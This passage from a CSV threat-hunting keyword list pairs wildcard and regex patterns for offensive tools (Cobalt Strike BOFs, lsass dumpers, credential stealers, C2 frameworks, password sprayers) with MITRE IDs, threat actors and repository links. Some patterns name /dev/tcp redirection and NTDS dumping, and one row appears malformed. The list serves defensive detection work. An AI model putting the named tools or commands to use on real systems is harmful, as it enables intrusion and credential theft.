T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*CALLBACK_PORTSCAN*",".{0,1000}CALLBACK_PORTSCAN.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*CALLBACK_TOKEN_STOLEN*",".{0,1000}CALLBACK_TOKEN_STOLEN.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*CallBackDump*dumpXor*",".{0,1000}CallBackDump.{0,1000}dumpXor.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","10","10","531","75","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" "*CallbackDump.exe*",".{0,1000}CallbackDump\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","10","10","531","75","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" "*calling MySQL shell. To quit type 'x' or 'q' and press ENTER*",".{0,1000}calling\sMySQL\sshell\.\sTo\squit\stype\s\'x\'\sor\s\'q\'\sand\spress\sENTER.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","#contentstrings","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*CamHacker has a new update!*",".{0,1000}CamHacker\shas\sa\snew\supdate!.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*CamHacker updated successfully*",".{0,1000}CamHacker\supdated\ssuccessfully.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*CamHacker/releases/latest/download/websites.zip*",".{0,1000}CamHacker\/releases\/latest\/download\/websites\.zip.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*can now impersonate users on * via S4U2Proxy*",".{0,1000}can\snow\simpersonate\susers\son\s.{0,1000}\svia\sS4U2Proxy.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "*can_flood_frames*",".{0,1000}can_flood_frames.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Cancelling the password spray.*",".{0,1000}Cancelling\sthe\spassword\sspray\..{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","10","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*CandyPotato.exe *",".{0,1000}CandyPotato\.exe\s.{0,1000}","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","0","N/A","N/A","3","295","68","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" "*canix1/ADACLScanner*",".{0,1000}canix1\/ADACLScanner.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","1","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*can-kat/cstealer*",".{0,1000}can\-kat\/cstealer.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","1","N/A","10","8","756","389","2024-04-26T21:18:07Z","2021-08-03T00:52:45Z" "*cannot encode the shellcode when self-executing the payload*",".{0,1000}cannot\sencode\sthe\sshellcode\swhen\sself\-executing\sthe\spayload.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*Cannot enumerate antivirus*",".{0,1000}Cannot\senumerate\santivirus.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*Cannot send REVSOCKS_NORMAL handshake!*",".{0,1000}Cannot\ssend\sREVSOCKS_NORMAL\shandshake!.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/emilarner/revsocks","1","0","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","28","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z" "*Cannot start wstunnel server:*",".{0,1000}Cannot\sstart\swstunnel\sserver\:.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*Can't find DHCP Server PID. Exiting.*",".{0,1000}Can\'t\sfind\sDHCP\sServer\sPID\.\sExiting\..{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","0","content","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*capcom_sys_exec*",".{0,1000}capcom_sys_exec.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*capcom_sys_exec.x64.dll*",".{0,1000}capcom_sys_exec\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*CaptainNox/Hypnos*",".{0,1000}CaptainNox\/Hypnos.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","1","N/A","10","1","50","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z" "*captcha-killer.*.jar*",".{0,1000}captcha\-killer\..{0,1000}\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*capture/lockout_keylogger*",".{0,1000}capture\/lockout_keylogger.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*CapturedCredential.cs*",".{0,1000}CapturedCredential\.cs.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*CapturedCredential.exe*",".{0,1000}CapturedCredential\.exe.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*CapturedHashCredential.*",".{0,1000}CapturedHashCredential\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*CapturedPasswordCredential.*",".{0,1000}CapturedPasswordCredential\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*CapturedTicketCredential.*",".{0,1000}CapturedTicketCredential\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*capturetokenphish.ps1*",".{0,1000}capturetokenphish\.ps1.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*capturetokenphish.py*",".{0,1000}capturetokenphish\.py.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*CarbonCopy*",".{0,1000}CarbonCopy.{0,1000}","offensive_tool_keyword","CarbonCopy","A tool which creates a spoofed certificate of any online website and signs an Executable for AV Evasion. Works for both Windows and Linux","T1606 - T1553 - T1105 - T1027 - T1562","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/paranoidninja/CarbonCopy","1","0","N/A","N/A","10","1260","276","2020-10-03T03:23:20Z","2018-11-14T04:48:10Z" "*CarbonCopy.py*",".{0,1000}CarbonCopy\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*cardano2john.py*",".{0,1000}cardano2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*careCrow*_linux_amd64*",".{0,1000}careCrow.{0,1000}_linux_amd64.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*cargo install glit*",".{0,1000}cargo\sinstall\sglit.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*carlospolop/PurplePanda*",".{0,1000}carlospolop\/PurplePanda.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","7","630","79","2024-02-01T15:17:31Z","2022-01-01T12:10:40Z" "*cat *.bin | base64 -w 0 > *.txt*",".{0,1000}cat\s.{0,1000}\.bin\s\|\sbase64\s\-w\s0\s\>\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","0","N/A","10","10","988","223","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" "*cat *.ntds",".{0,1000}cat\s.{0,1000}\.ntds","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*cat ./apache-tomcat-8.5.77/webapps/ROOT/tomcatwar.jsp",".{0,1000}cat\s\.\/apache\-tomcat\-8\.5\.77\/webapps\/ROOT\/tomcatwar\.jsp","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/spring-core-rce","1","0","N/A","N/A","1","51","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z" "*cat > /dev/tcp/127.0.0.1*<\s\/dev\/tcp\/127\.0\.0\.1.{0,1000}\<\*",".{0,1000}catchetumbotifyoucan\>.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*catphish.rb*",".{0,1000}catphish\.rb.{0,1000}","offensive_tool_keyword","catphish","Generate similar-looking domains for phishing attacks. Check expired domains and their categorized domain status to evade proxy categorization. Whitelisted domains are perfect for your C2 servers. Perfect for Red Team engagements.","T1565 - T1566 - T1567 - T1596","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ring0lab/catphish","1","1","N/A","N/A","6","594","123","2018-10-16T12:57:25Z","2016-10-24T22:48:51Z" "*catspin.sh http*",".{0,1000}catspin\.sh\shttp.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "*catspin.sh -info*",".{0,1000}catspin\.sh\s\-info.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "*catspin.sh -kill*",".{0,1000}catspin\.sh\s\-kill.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "*catspin.sh -run *",".{0,1000}catspin\.sh\s\-run\s.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "*catspin_for_readme.mp4*",".{0,1000}catspin_for_readme\.mp4.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 